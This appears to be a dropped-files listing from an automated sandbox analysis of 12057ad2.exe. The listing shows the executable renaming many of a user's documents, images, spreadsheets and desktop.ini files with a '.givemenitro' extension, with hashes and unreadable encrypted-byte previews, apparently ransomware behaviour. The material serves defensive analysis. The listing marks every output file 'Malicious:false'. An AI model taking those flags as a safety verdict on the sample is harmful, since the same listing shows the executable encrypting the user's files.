                                              SSDEEP:24:oooiezBGPnaLKrMM8ebwFGvdrkTsLhnbf8Em8nlJn:oBzBGPnC7yvUAYEbld
                                              MD5:2D58F2AE6F0B8D824E1219E6C1FF78AD
                                              SHA1:BB7602B1D612E3FDEDD6A34FADB7A767309325B8
                                              SHA-256:C1C9EAA4D3ED4374368EA201324109FF08D9A98641982DDA5BC9CCAD9BAEC726
                                              SHA-512:7DFC904C33F39BD3BE498416FFD13CE6BFF77A03D113C02F49A91F00001034C95ADBED85C424516D43A1F0390FF767A24943DE2AD09EAD7F2D08A6ADCEB43F33
                                              Malicious:false
                                              Preview:....R..R....=O....<..PD....zo....,QgF.(.......v.(.J..u`..s.]....Fm...f.9".+4...'.q....\..6g....|.e&.S...~%...@;u.y.....d....i.a..P.p#.A/...b+...q....x...h..Z..?.......{...~..O...].....eh!LLEJy.........`Y.r.4b.S.?.o}.q....._....G#0..p..YEP...@......@........Y...L.....D.K..8q7.N.;Y..*..r..:.......L0...nB9.x.L.+3.)......k...{g.6E..gD...^..(.M.:s..+o/...b.f..e....V....F..Kj+D....r.O...3D.A<...&y.!.o.g...V...$Y...0iUQ.. .*k.......Ot.]..C..L.^'{.";....;8t..z...."q.&.)..P(Y#.g(.Hf.Y!.2T.w........ }....r..L0.&.......E.k{..za.1...........`.Q(..o.X.B..QkX.O..."..6u...../.9....`.3...x...._r{ .2s.....U.{."4h...G...%.+.."..*...6......;.9...rp......O.U...[aoQ.~@.!..x].2.I.p]H...L..h.....*.-......lS..6c-.2o..0}O.....L..h......m..h#.i.t....pQ...X...v2$...%.....V...H.V.Py...m..]....:.&..n.....lC...<..bo9/q...i.M.<....&.E~B..#...r.....^.\X\R.%..Z..&..7}#...#.. ..z8......kW...e7x.!}..PL..}.D.....fy.f...X........4..$%@..R.,.%F....b-.....\.O.O....X..._..s....Y

                                              C:\Users\user\Documents\SNIPGPPREP.jpg.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.796327833832058
                                              Encrypted:false
                                              SSDEEP:24:vt4F8L70hkxVYDR7vU/KZO625Q4KFXZM9oDM+dS6HAldJ6:vtq2TYDV8/KZOL5QtBZMX+rydJ6
                                              MD5:0CD1FCF71863249B4F4D348208421D38
                                              SHA1:AE7FED0BB5C5B4A97006615BE546068C6F244769
                                              SHA-256:4435FEA70F969D6EC3C025DA80BF626B795B7E3DE4EE713E4769F75094A747D9
                                              SHA-512:C44D64806803BBB911B1C7036D27F690124AFB3A84734800F2EEA8608D0715946FD85C4D1351A745BF28B3D0F9395D059A18A441928AF776C9DF1CF562462E80
                                              Malicious:false
                                              Preview:...F.....S+....[.L....-.v....$..Zu{i.;.........~.Q....P......D..R.3..`...L.......{.2K.n..=.i|.[..V.2<..U!...`=.#...7.%.:X...rN.6;.g....nf~....<)5..=..;.N..p..cog.c2.../. ..?.2.T;...Ky.{1.. .dy.7.z.$i.$...84.4..(.G..W......2..............B.=..kZ'S.)4Z....!.1([..(g5..'..Vv|..!.../..._DL.*...u.G.|.w.=.Q....p..$I...2 ,.....(.^.WUI...C....q....v/..m.^C...5....R.2N.2..+.....8.V[...^|.Z|*...b6..9._...H../..UA..(.s...G4.oW..^...s..j.........V.%...y...A.....|.S.........U...ztn........0.|M.pW6@r.Z..bv....g...=...@p....b...,.7_&:6...O.J!..mL....Uol.x.k_[H.#j.>....s.a).O....Q...+D....3,..uE+..w=>.+D?...e.=..Z.8l."...g.[zK./.F...9...C-c.)..-......L....F.=..dn.~.&...H. rYb8....V..t0.L.#..........x.....[N......3f@....W.,!.......p...!.z@xI.....-`.U...az...b.|:^|...C.Z..n....<mu.`bx<B...QV...W.Y.v.;J,....k..j..AlZ[G..+......zK.L..hG...7....Y$.k.....n.;Q.S...aI.+mzWXs.9.}6+.'.4.L..Z.... ..L.%.......r+...j..$2W..v...4.xa<.......r.K.>A

                                              C:\Users\user\Documents\UNKRLCVOHV.jpg.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.837404622525821
                                              Encrypted:false
                                              SSDEEP:24:9P0TjbC7CLq7vffJtlnA6QbFQ7grtNIq9ooxK21B1rZVyYWp/JcXb6triD:B0TjcAqJjnWbbtqq94G9CZpxYbt
                                              MD5:CC2DED2CB78E960D30F817B441166E9B
                                              SHA1:232EC06AEAC50334F1A22C6523FCF4F11340E6FA
                                              SHA-256:210E92CD064C0DBDF0006A34C127540742575132D9E45E55D19A2EE88B1898BA
                                              SHA-512:1982D2CBCE5FB563CBA736257FFDC5D565BEB3865D72A1C48AEB48AEFC93534AACBB271C37A122E746DA279A182B6378C2A80DA6771459CADF91CC3606BB68B7
                                              Malicious:false
                                              Preview:.M.7KR}|g..\..R.!.....sT.L H....!.S;..5.e.^.V...VQ..p9...6H..B...@)....~.....%...94Y.../..xK.A.{..DM.(.....V..l<...n....{.......(......tY.Q#....]J,|..u.t.....4.^%.c.!.....=3z.*. .r.".m...{A........o.U3.U...;.h..s..O#.NP...$^..........w.o.K9.$P.L.uJ...Z.....vd.]xxA...}..D.:.E...X..i...b;w...V..N.5"..1......oZ...._..<_..N.....g#...E..>......*.>.....&.E.,.....;i5..5....c.?'Z...!*X).~T..{.......3.AsJ..'..{....4.1......p..J.u93.~....)|......J&H..+#..zA7....c..He...r.9.ix..`A..s.E Y..87.:#.0.....4...6~?...)yvHb.......[.E6.T.....7S."<3......>.a..Q.F...&v.i.`L....3.....\.X[.d..+..x.L7...;..D....4.2........fq....;W|...4..BM.8().)...3.e....#9.@".<&T.9!..b..e..S..k..........U).M-.Ol5s...wK..{.9$.z.D..........<...`7..:lC.?.{....`..T.O..........O...6..?...B9e....G...x.......w....-F..F6.g......r..h.G_.......e.l.....s......_..R..1..Qd.[...h.OP...fz.j...(-L...lJ......k!.g...tF)s....#....4...|..5.O..}Xq.[."....E1p...U:..k....$...!%..FA.y...x.4.2....O

                                              C:\Users\user\Documents\UNKRLCVOHV.xlsx.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.8086087157940405
                                              Encrypted:false
                                              SSDEEP:24:0LWxiRs45k0j34YqL/F7bicuZiceM6/VAJpd9iMtqmLAn:0LJ5z3ABlcebtWREHn
                                              MD5:F7D77BAD37ADFF5E77F502657EE8364F
                                              SHA1:0390814BAA3872CD10E6D742B8C18E5BBA1B809E
                                              SHA-256:E7C81637EF75662271BE2DA166A420D59C1BB4D6CC8BBBD4FF4D89543FC1722F
                                              SHA-512:CCE1BE67FBD5BC32091747D4DD1814CD2399AAA898589FE0862041D5ED0F076DF0D9C5C1812BFA56C83B32A2DC5D75E1694533B7057521906C0AD7B5FF1B52DD
                                              Malicious:false
                                              Preview:E......<.bLV.maJ*=..d(.....x.....&.V.....W.&`......b..&...7......@.@......dQH..X\...0G2Sb.b*.a.z'.....)....$@7,.}E.......Y..^....'...>...q.C...9G..xS*.hj...S0...9..&.e[.;.A......`.L.,..X...-.5../.s..H..V....}K ....j.}..\`...W......x..f.....7.0.S....s.C|..y...n.FK.Zc.....F....C.J.[`mK.il..#...Z).........T..S....tNK.F..-..]^..AZ.P.W.`.RS...&..JL....F*M.!..:I.....4.hS)..U...2..hq..vvEs.cj...?a'.42......onn...,zid.6..8k.8.U\Gl.W.0...8vV.g.I.k!(...8..t..3.c....8z!1....A.:.........Q.H+.......g_J.t.!.........T..MT.].7.#....t.#..y.rC..Y..fd..|b..G6..g..Z.(.M U..&A.".......vt......:#...9Vd..@......6(..5.~Nt.k.X..2.....z......dV.uk..a..7...N.ou......{.R...?.v....yr|.tN.0..6DK..ld.y..O..v..)......%z.hy.gT...........Hr..\.......Z.&)......n/..0....K%".#.5]..Ji...N8.Dm...H...f,.%/.h1N..25..[y....3.+.6...!c;NN"3.^....vU[.N......Z.b.[.1..w.>$.y]..8.R..Q..A...r..=.X...K.x...r.s.s5.....%..<?.x.".Gb.....G.>-..#-r..R.Xgg..B.$".o.|TN..-.)j.h...

                                              C:\Users\user\Documents\ZIPXYXWIOY.docx.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.804110408504276
                                              Encrypted:false
                                              SSDEEP:24:5AqxT7pmrhykULFIS2ySaSayDqV2aSctHpvY4tW8aL9binmVg:CCTdmg5LFz3jyI2ahJg4tWlwm6
                                              MD5:5AB3C7295DF25695C3F16AED3DABC16A
                                              SHA1:9931D7AA5982C3E47DF13BF3993CDCC68033EEAE
                                              SHA-256:EF31691DB41F48F78C6E12166A9A0AAB19C0AB701DDD017A91D93EA8916673DE
                                              SHA-512:BEEE163D397997A512DBBB2EBCA6506C9356BD963562543EF4ECF27B7F717E258ABB8CD3AFD7C9C6C20878CCE3A3EFC9C13842A4EEB8F81F8A694F5CBD9402AD
                                              Malicious:false
                                              Preview:u..Xc...H....~I..7..1.Q..b~I.^...>.i.......Mc.q..&...X.Y@..D.f;.......h...iu.=..(.U.?;.~&....i.....9...G..<A.7...+.7.\ .......".45.0...[8..K.....!.h.Q..^.b.G..5N.][......@f.\c...e.m.q+q*...*X.;8p.5..n.)v.Z.....5..A...).Q,).... .hz...1..r....|..={.Zx"A.g....j..C......D.L.'.L...A..l..S.};>....mA+T..4.13=.....V.g#.X..*C.....0...'w..`&a.lR.`.B..."s..G.vO3.<.n....e.(.+.].....1..o}.o.h..6=.....n..3......".A..F..L.N..]..uj.U...M..8...rJ../.[.I..^'z].l.X...j.4.....(.y.f....1....^...e......2.vN.......O....+.....m.M....o......Ku;..=.3.-....;...9.%X.S....O........-....Dh.P.1..+.Z..q.....~7........6.#.^.m].n../.#.......N.s...t.....,w.|.....v.*...B.S...K>m.f.....o..c....P..kIT.{D.{].'....m^4+F$...NT$...$.7....c.......X]....#...gB..Ae....^_.....y.$..;.@..NW.F....(.l.d%!o.&...C..o.X.z`...M.Ked..{*.o......$K....w.).6..^.".c.y....r...H......h#...&..ZN.....Tu%^cd...VU...T..>wb.y`.*$..q..i{...D;....kW.H.d..<\...".YUq].k.FV.lC.IyBi.U:9..y<.....L...

                                              C:\Users\user\Documents\ZIPXYXWIOY.jpg.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:PGP\011Secret Sub-key -
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.804447378961386
                                              Encrypted:false
                                              SSDEEP:12:zNeCJJULn9hB/1urwZ5UQxYc+QsdN3i5/gAPcIdS30/THNIszoWKX4EyJy2vVsSl:l+n9hBturMVYamg5ogI0Wsz/EqVGCoC
                                              MD5:C404BEBA670D917EB14E7008132F6883
                                              SHA1:B4D1B744E9C59F40D66256CA795C529C89DDD322
                                              SHA-256:B698C1400DBD9902AC0CFA89019713724FC9D943B6AC869097288A7FE06F9E03
                                              SHA-512:16EDC3947FBE61E84C635956AAE019E9A7F19C03AA9B0C940A1F4372F58DC9803C460F689096D8880E102913F45BF5A595AD7F2371D2258B6B50D5D7EB91D418
                                              Malicious:false
                                              Preview:.].#.5._g1/.6a.A.o....ep2..<?..E.vJtS(PT.9a........w.....4.ZnD.|..._....^].}........s/+...4O%.YJ....cL(&..j...-.E.............Fa....a!8p....*].=<.P.k...G...3..Z..Xx....VPU3.3.=....A.V...W...VH5.(v..q.YQ...._.Y..vj...)~5....(..."S..|.>.U.B....D.I.D...2.....p..7...t?.`....o.@j..tG..>.hNF......*p.=....I.9Qm....87.J...Uu0...F..l/..n..~&q.K.\.T...#6.?uW...W...V.(.r....k...a..~.X.OkPlL.0I.._6."s...,..k<.h.._.....>....U.~Z.y......8.WT....8..*h.2.2c.!.....a...)...ji...Rh./.7Z_...j.9..!...Ra.?....T.....O..y]V...c.1J...eZDX.J...=..k*...}..w../s.5>F..aGkF.b.J..1.V6..=}..&..d........gv&.*......)... ..xX....../....Q.7..Im.!F..q.c.H.....:.T.U...J...d.T..]f.....ru..R..=b_{.h.#.....b..|.z(AF.7...!.Z..n....J%.......&.....P............t&.P.."wY_$.p.....j...p..X...*....e.]..X.Qq}.(.....^.....6z.KN@..X.....F........&....(..a....2...-$:P*.....hAK..-....7I.#F..P.....S...k....K..X.....;.....p~.u .E...N.^..s......{E.qKS+.g..$W.Q..=f...-...0..6.T.K...W.]...+H.~..L

                                              C:\Users\user\Documents\ZIPXYXWIOY.xlsx.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.827360833598283
                                              Encrypted:false
                                              SSDEEP:24:cHQoQJ1pwKtYqYWDv38DfA70KQOoll1HClMTwl5:cHyJrdtURDodgdE/
                                              MD5:0EADD47980305217E3898A099502515B
                                              SHA1:5D8506C4BBFA65827C6D89FC6E2F0E8B80DC6F92
                                              SHA-256:90AAE89CA905BE071F5C6BF3BDF62FBD9BE56E929550DCECFB8AB656FB59DFF6
                                              SHA-512:DFB0861EA19435D1EE77AAEA03B9380E38F7B2D622622EBA672D5923656EB9FE0657F57BA70BBA4960FB9D2E5EF116CCBE61BB71CE5F4B092E80D8525B83B4EC
                                              Malicious:false
                                              Preview:..b.S.&H.B..#..'..gW.X.y._...mI.q.U....Z^.$.XC.dY..o.;...x.....a.*g.@.RR.O...........@-....2..{.>h.KE..*..;.-q..v...[}..}U*S#.t..._.\.^..&...H.h.^....ae...Z.......i...Ns1.....rG.nH..&d...5"lL..0......G5.......w..,...<P.....^.Ml}...<..9.............j.x.j..C...j..*.......M..7.u.rR.......<.Y....2...h.......f.^;a.VM...9.z%~W..^4.....4LB...x....K....N......n...P.X.~Vk.]s...~zrN............L.*t.`.....g....6Hd@..x...Df......R.}Q~L2...].Tn....^..6g...L...ZL..l8a.+../..K......8g).../.{..|.....*..`.|L3E...j.9_.m...G.!...jc...Sq.@......e.D.....p... .,.."}#.h6.@S..B...'.%._.:h.....O..?t@.#....&j.D...B...zP..r@^...^......h....g.~.U.O...8.....;z...S.%P5oY.j....`..Q{.i....[d B8..g......^..`...F..%.?U....:5...Q...Y..r4A..;.m......CL<q0....2Q)G.x...Xo.s.F..cz..!]b...% .I.l.cbu...(.Kx..g...Rd.{1..-..U3...F....F..E...n...........d>.s..3..3K9.....Y.q&.^.Z.++......B..#\* ..2...Z.....*.9...dh.I.Q.O..CfOWt.....Y.F...\"F....\.B.vm...].%.9Z4...]<gd...:

                                              C:\Users\user\Documents\ZIPXYXWIOY\AQRFEVRTGL.pdf.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.787747393591855
                                              Encrypted:false
                                              SSDEEP:12:+cn5486UlNnRP7qn5MSg08o5oTODIith/EDaUZDYMIKBXtuNDeNufyrFM79GOCji:+grlvjgJryW/4amDYO4ariRJtRooZ
                                              MD5:7E330D97340BF1EA99FEF331E18D86D0
                                              SHA1:DF1AB374113D9F8EF649D2A8236D3E6E641DE62B
                                              SHA-256:7C1168D78FC9D40DF1D02D39875EB9409AC69E689CBCE98E4DDCC82574BED1B6
                                              SHA-512:136922F315327E60011D2EC0487BC6BD85AEF116248B5D1D68C2B704075B1DF1D37ABE11C25CB7FB337FDBC0FE29ACA3658B3585E0D2E872079859500088C6F9
                                              Malicious:false
                                              Preview:H...v.-u..3..&......lL.R...<...I.F.S.q...).sMr.?2.l...yQ~.-.j+gC'U.>..._.v.J.'.&.<....=.%4.?\.j...B.o.6.....c...3.\5\.)+..Br.....e.#.B...X2w.,hV...[.!.h.-.<;R.g.]...^$.$_....E.L..?8.a...Dj....!5i......b......I.]....Q}...|..*q..R.n;M..?...+.F...0...^..@...3.. _..8zI...6]T...Nf..."K.g.;..%....s.j+<..X...I.#..-.]).[..i....8.$s?.y.,../..Tf..Tdj.F.|)..a.S..\..P..P..z.......G&...Vv....Q6.:h....L.\.h.}.U..:..n....2j.;(.P.$+.......5...j.j..x.R.H.v.Rn.0P..]...c)o..Yd.1Y.Bs...r.~...R=.s....+....r._R,.4M.m$.<.y7I1..K\9...apN.+..eVA.....H..~.+..m.b....t2.%....P.M..w.b....G.z.Y="..=-....|..w.....U.r...?a..Sw...{.....6...d1..kp0..........%..)d.c.:c.$.d.....O.b...G.#.w....\X.....D.#...3./....\.^..T_......\p.'......m?..:...].f.T........1.p....\.f.0.Nm(4.I........vy...W..<....Lz.....y.z.e.>......0gQ.f..fq..8D(J...6.Q..&6.~HB..6.E?l .Wo.7..9......."U..z..P.uf.Q1H.....\..0...s.h..z?`.J%..:.%..d..37.O].....J..j7...f.%S.<e%..2+....n6J.5.....A.C.g..".17..^J

                                              C:\Users\user\Documents\ZIPXYXWIOY\DQOFHVHTMG.png.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.822549443571841
                                              Encrypted:false
                                              SSDEEP:24:XDD2ic998o2x/FtZDBx2EIZi25fWH67i9YGox:XD9c998JxNlQEU546W9Yf
                                              MD5:1CE722FC89FC199371398188FAC56832
                                              SHA1:E3A2D35865DAA99078EBF4DC27A88B80A1B69E76
                                              SHA-256:3A08FAC7EE4AB773FDD46D311E3C2A0CCEB06271598B118D1EDB86FD854C62CC
                                              SHA-512:EE72C66A06EA8E90A446EAAB68E0D1A2F768DCC35BA6440D50BEB205913ADF2E502E1236B19BA652CDE66D86DE8F21B347212640318BB27368B0C24AF7D7448C
                                              Malicious:false
                                              Preview:...Kk.q>gu])."86.R.7.v..y....w.<F.5....h..Q0aS[......~...G..1..S.|..9z...6nx...2/.AFa..z..._D[.mh.......V..:b..F.{. O.8...P.:.f.....V....di.g...[hy....5..{<.3.....&.P..<LY...BS...wl1.A..Z*....J_A.....\o...[D.....@%`s.L.e..AV..)W6... ..Kv..'.2.H.......t.>c..m....B.........A..uy..a.+.T4.s...y].AP......y.P{5."A+..J]..../.....!.1....e7./.Y@.F..&.......[.'..)l.....~..O..?.7l..%d..*.h.;...j..2~M5#"...CqZ.n.z.0.}5....=B.B.F..o..WKxe...#...;..;..F9.....F.V~(7Q:......=.+..&0.-....`t.D.+..Pu.Rv...M.yI.wt~S,+.I...].......6....f...\,\owEr..z3......Sz.......(p..?..'.g.7/.8....v.G......E...v..'.a.x._/.lc.....|...8.p...1.-......?t4.........-..(.#=.K....u.7.J.......a....W..7......S..j:.#g...H.]&.....r.....8Kg...........,PJ.g..0.m.&v7..w..O.....N.wP.T....n....&1..P...;..Q9qsv..P^..E.V.YS..E...Io..|:<.C.......l....{..T{..._.......N=.e..3.UX@..d..N..WI...a....+/a.6...s.\.n.J....z..Gm.'.j.l.p;..2\7.wY..c...p.........V..p..P.....lR.j.WD..gq.....

                                              C:\Users\user\Documents\ZIPXYXWIOY\IZMFBFKMEB.mp3.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.818608510132549
                                              Encrypted:false
                                              SSDEEP:24:ak1iMA5ovdBaY27MKwFrH4XmOPHsqK9zmEk8ykzhkYm/:akBdP241FrH4XmOPGY8BhkX/
                                              MD5:FBE1DE97970B6BA7A4A545B4B9B156E7
                                              SHA1:BCB6FB106AFAF48A3229F99CD2EB99453E83BDD5
                                              SHA-256:942F8E3B6BFD2E2FFBE576C4EC9CB99895C767EF236666F2F4DDD9965D15AAA0
                                              SHA-512:EDAEBA63F71C86FD141EE62F9C4F465659A1EB007DA45CBB6D7C858E62577AAEEE9318FA2A506D2B3AA2093EE67A33760BAA09D14C2625BE91C849C02D47D45D
                                              Malicious:false
                                              Preview:......x.....c..lc&.#.R......fc.B.i......Z.{.|C...T{B.#..p....ia..WI-Q6%....X.C.vD..w..X{a.N.+.....]@....3.....k......1Gm.P0.;z.;].?..$A..".......F.....T.I#w...z..(=Jr.........w..L...~..f..R..1.?/v............(.\..H...a....OfoK...Vb9|.......?......)-k....ZyN..._.T........T.5.....Z.^.h.w.[.[.a..g.V...M.26.....O.W..X...&&vW...`]f.D...........{..$a.,..5.rga&.7.2.%.q.ESB._..C^.J..b...1\vR.+.g.^...d.%...6[.O .]Ti..b._.Z-.;3W..$P..T..QF.<.Z3..z.>.!m.......2...f...ok.h....%%.......@.F.......[....5X..@.......(.}...=.ar.pH...;;...l.....m..<-..'-.P....Q>.v.A3!.po|.v....B...U2.u...u......@...X...{g)l.,.&+...EW.~..r..m..x........Y.....'..^.kz.-G#9..I.J!.U......z...e....\.....i... x..y.A......3.[Gf.*.Wv.g;^m=......q..g.\.....a,B....|(;{..1....p.d\...'/ .6....$.J#a..<./.......F.Lt...VIp.+..=......5...N3!;.e...5......_.......W...g.Q....:&"i#S.....x?.*]3....$.:.D.t.+.D4...T..U4..C. $~3Q.w.:...!.yS...B.....n.Mk.kl.........:=I[.z"....^...n.]...Hg...k..L4.

                                              C:\Users\user\Documents\ZIPXYXWIOY\SNIPGPPREP.jpg.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.8179425455904745
                                              Encrypted:false
                                              SSDEEP:24:BaJtTxIrZMnOCX2nzj+GD/OuxpnCrCl/iqcO6vVj9i3GDwWs4s/eV:Bar1OMnOCozmuxpgCl/ihO6DxEWsv/eV
                                              MD5:55C5C44D79FB2AE7537464ECB1172286
                                              SHA1:FFAC41297A7C19D1F3B499795357A05C6CE91129
                                              SHA-256:56092D6FDB6AEAAA78EA5FF62BA929969BA86C8D51F6BBC985EF8F1EA2310E26
                                              SHA-512:5C95EC342DC1E57EAFABA1822AB8239F35A601DBFFF4B8E20ECBAD8073EAFB67F23760732D2E864F5C7964F1C82AF3AB7A41572D5F1CDEBADB6B999AA68606E8
                                              Malicious:false
                                              Preview:.u.pz...a..#.<j..x....3t.?.1..d<f.@-.H..En8&?#.c^....h.....!.....s.$p5.".....y.S.v..u!.V.m.......7.%.-....0 ..:...(..|.oc.W..CD.H5s....hrn.M.!}.t...1a.\...".=;.*.....q..L.J..".....`.9...k....s....L<.?1W...7.U.M...{.c...>.v..1.......&....{.4P...0..B5?9.g....e).C.K;..@k..Z.....K..`...C6.g[e}.f..l..(K.{m..0+.T\...nX...&`....C]|.....$...2c.A...'.....f)C.u..G....AP.r..=..kN...6b.;k.S.`.Y.?Q.b..|.....V.gYy....Y......A.3|.k.P..."....T.....*XkeB.\.[7....!.|.....T....'...e....n..3qX.....'{?.i,..,k.0j[.fa.LE..4.6Y..........s.8Y.W....>...~br.......K.|Oo....5..g...:./.A.?.....rCr.0.quN..$ ^...-.....I.u4Juw.....B.:..L.ss1.q.y.%q3.u.....e...3M.L....i..2~ 6.?..K..qtD.X......d-..A.hH.Jt....t.....^*a..P...?Ffi.\Z../...y.CX../.Z..bA.6.$c...nkAY)G....p=...5!y6.....s..DCi)..._..gK.....@._.p..."6Y.%.d.Y...}B\b......H3....*.8.....M....6.....Q..K..l0U4.%~...r......S.KA.x.3...~...W....)...d..H;0.A..,..d...a...5.~.....i.a....,.....&.]~.(W.B....vy...*..8..}F

                                              C:\Users\user\Documents\ZIPXYXWIOY\UNKRLCVOHV.xlsx.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.793272271736592
                                              Encrypted:false
                                              SSDEEP:24:sC5uhhoxQhkq9Om0P6jmsTcOM+KOp3aQ60EMrt9N7:FYhMQWU7s6ysTloOQQ60R9N7
                                              MD5:1700C1E331CFC85BE6807F0F5DFB5FA1
                                              SHA1:A10A96B3EB7C0A82FC98A7FFE019C2A5EBC06773
                                              SHA-256:CB71137BEDE81064B07B738BE34755E0F6DAB78FCFF737AF549DF9468654F687
                                              SHA-512:B62A7E055ECFBDE6B5288F479E1F7F4D27F7727DF155853111C7E0EABCC143BF192D2442340300458FB3C5D36C438218CC78B0F44B302CA490EFF1C9ACBC3E98
                                              Malicious:false
                                              Preview:.t...Cy>.1.](..1.....<.W..+1$.1.......q./A.N@6...q>....cM..{.....p..6...........?...Z..hw.zC.....(.EG...r.&Q....- _w..F[ ...3):|.!S(......q.(<G:..K....I....@........y...g9=.P`.4..[h..`...t.n....1M<5...?(.....'......=g!..c...O..\.:?Kp.....g%..q.".JG..?...`....-.r..q.bw...a...b.k7.q[...eB.K...d.O?..l......M.L...S......~..sQH.F.bu..$A.T...rl..?..{.l...&.L,....2...jg.#.39...:..r...[.....?..=x/.D..r..4.W..F/.;.q2^o.I.2.z.j...E..wkY...Gd.x..*.d.KJ.. ..M....'...H!J..... ?.+.9...%.(.Ujc......~..l....>b.6.%.0..j...K.1..(_...v..z......s..q...|>-aF..!..E.yl2..yr.d.......t.$.AO.1.]...U..q2|...."xb..P.................4gK...n.....,...q....3Y...J..S.]..<.#.X..=..[<...g9{>....,./...ga..}I..[....j..A.Z...N<5l.._..8..g.1Hn...S..?...D....C.bkg...F.%.m.W.1.8[.....:.....;.]7..l...Y.=....../..(.K...kT..7..:.h......L.wm.....F.z/....`.#=-9}..3"...18V...Y.L.>..7yHO.......3.k.%...`...s.x..p..s/.a...A.n$...B..K..Z.$..W..........).l..4......\.$HvTu%S.q.

                                              C:\Users\user\Documents\ZIPXYXWIOY\ZIPXYXWIOY.docx.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:modified
                                              Size (bytes):1072
                                              Entropy (8bit):7.81365096710166
                                              Encrypted:false
                                              SSDEEP:24:MCy5ZJLVuszIQt064LWwRM7hfmVPsT4SfuVWwmnd6:MrLV7r0645R+gd52uDmnQ
                                              MD5:F12953595B3C3125F79EAA30206A9F0B
                                              SHA1:CAB38CD9F436FCA814D0016F5384DB91E27BA5AD
                                              SHA-256:60AB6E53E7C434125444AEEA650B0A16080EB40904AF44E02D23F24FFE3B23F1
                                              SHA-512:FA12DD4E7AAA3329920F15D1FC3FC9566071EAB8A171DE57D20C0E268575E1DE9EFE00DBE37546F41D16469EF67E3F0F95A16A7FFF43F5E00EDA00DEB7BC86B5
                                              Malicious:false
                                              Preview:m......3Xx.q..BY.OS._...D.|.....z............f;.t.f.k.1..G..R......".....G{........T....]...eF.R. .....x.^..=:WMqa......+."`.....Q..(....8$..f..@l..6.-...a.Q'3.OL...i.C..mSRhK.@....e.Xe.q..(....Z.k.5]..K.C......zg..!aZ..G}.n.....R..F......X.~+?L.[.....n.y.g..5...v..U.3.)M.[G.f....(....;Wx.#,....q.F.T~ju{M.......eiG5~X.&~..PM....$..A..!w...{w.p.|.0.A...7DQPUoT;.A$.t...J:k%\../.O....+......]...K....S..)U....8.R/...\o..&...._.H.......v..j...r.fY./..K....(*...........2.../S......)N.'}.....t.Jci..\.-.e...\3.._fgx...K...(.?...#>8..).E/.`..r.6..xq..=....+.N.8.....l.(...._K7.G...<...^.wR..;....t...~.....aM/_..p.....V......._\Ic6E..#....u....0.PQz.....M....Y.Z.9.......k..He1sX[...g./ODs.......V=.~G.d..m..$..O|.;...W....#mR...Lx.F.....j.yd.{...a.8WH.H..\F{y.......vT....%.E_...;..=..7....R.e^..J.Z@..v.."..X.{y.............t..w.v.+(.9=k.}.t.....\...:..5..%wL..m;.[..E....gLy.......>q7...$......J9C..<.d.M...wk..|.\..!.;....rWt.P.@<.&".d.Q..,.......

                                              C:\Users\user\Documents\desktop.ini.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):448
                                              Entropy (8bit):7.441710748148304
                                              Encrypted:false
                                              SSDEEP:6:9CudHgt9DcIlsjKsFKtqnOd2o0oX+a338wdrd6W9Il95d3leYK4dcTX9ugi4Mgmi:TO9DdsesFKIOqouaHhLQb5d1LKlTFiBA
                                              MD5:F1155AC811D581D73E9D3E171BE8D125
                                              SHA1:539BCF53A3C9E5A4816F1BF128AD3BDCCAF25185
                                              SHA-256:59AD74F4ADBB02336570C82E85CFB6FEEC8BD046D6090FF37D6BC9FA4A0210F5
                                              SHA-512:AF4822869866D596DC494335DEBE4B6940A08919893CB279528A7087745E34A5406A81574C236BB10ED1BF8A741BCF72A9765805273DC091892DD70ED4D43F5A
                                              Malicious:false
                                              Preview:B.. @.^jQQ..(......&....r.n..p...)ZY........f...L.6...F.w}.......7......b....2p..../...[...4..x..`j..x...~.:....ud..r...S....L...5e.s..gWYV.+.@...H>..!..".....4..H.QW.m.Y..-..NL.U0y.........rj)B3...G~#.6.......#.).&!...eg..H.....;...:8.9+.........R...j.,..-r...U.q\..3V..L;y.7.p!O.r.~.1.R.H...../...t:z..D.%.p.y..|....55.t=.x.^VK..X....w..A.:..uz.&..c...Dd.3Du.q..2!..B8...jeaC#L...!4.A..-.B...D...j..;..N...<w.9t..,.^.o....X[..

                                              C:\Users\user\Music\desktop.ini.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):544
                                              Entropy (8bit):7.601044312232493
                                              Encrypted:false
                                              SSDEEP:12:Lb2NEhDhup5DL6gY0Z1cs+qL5F/N8N98XYXtZD9KaE06EcAUVkw:n2adaL6gYpsfLXFc98IX3RBLcVVkw
                                              MD5:FD678875BF0C8042583CAB243DCC6C28
